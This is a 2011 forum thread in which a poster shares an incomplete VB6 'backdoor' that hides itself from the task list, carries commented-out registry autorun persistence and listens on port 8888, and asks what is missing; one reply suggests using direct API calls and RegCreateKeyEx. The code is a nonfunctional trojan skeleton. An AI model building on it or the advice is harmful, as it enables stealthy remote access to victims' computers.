Jump to content

- - - - -

Please Help With VB6 Backdoor

  • Please log in to reply
2 replies to this topic

#1 cr@sh0v3rr!d3


    the 0ne

  • Members
  • 1 posts
  • Gender:Male

Posted 25 May 2011 - 04:19 PM

I forgot to search the forum before posting this thread. So please feel free if I double posted to tell me.
Okay here is what I've got so far in my program (VB6 Program).

Private Sub Form_Load()
    Me.Visible = True
    App.TaskVisible = False
'    Dim Reg As Object
'    Set Reg = CreateObject("WScript.Shell")
'    Reg.RegWrite "hkey_local_machine\software\microsoft\windows\currentversion\runservices\" & _
'    App.EXEName, App.Path & "\" & App.EXEName & ".exe"
    TrojanWinsock.LocalPort = 8888
End Sub

Private Sub TrojanWinsock_Close()
End Sub

Private Sub TrojanWinsock_ConnectionRequest(ByVal requestID As Long)
    TrojanWinsock.Accept requestID
End Sub

Private Sub TrojanWinsock_DataArrival(ByVal bytesTotal As Long)
    Dim GotDat
    TrojanWinsock.GetData GotDat
    TrojanWinsock.SendData GotDat
End Sub

Private Sub TrojanWinsock_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
End Sub

But what I was wondering, is there something missing in here
that should be in this code and isn't. Any help would be appreciated.
Thanks in advance.

#2 Afterm4th


    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 403 posts
  • Gender:Male
  • Country:
  • Location:way up north eh

Posted 26 May 2011 - 08:45 PM


#3 TheIllusiveMan


    Will I break 10 posts?

  • Members
  • 6 posts
  • Gender:Male

Posted 02 June 2011 - 02:37 AM

The script in itself doesn't actually do anything at all.

And even if it did... you should have called the API directly instead of dropping a control into the form. One of the reasons why is because VB6 uses wrapper classes for that control. These libraries simply aren't going to be installed on most computers. And RegCreateKeyEx should have been used instead the windows script host.

BinRev is hosted by the great people at Lunarpages!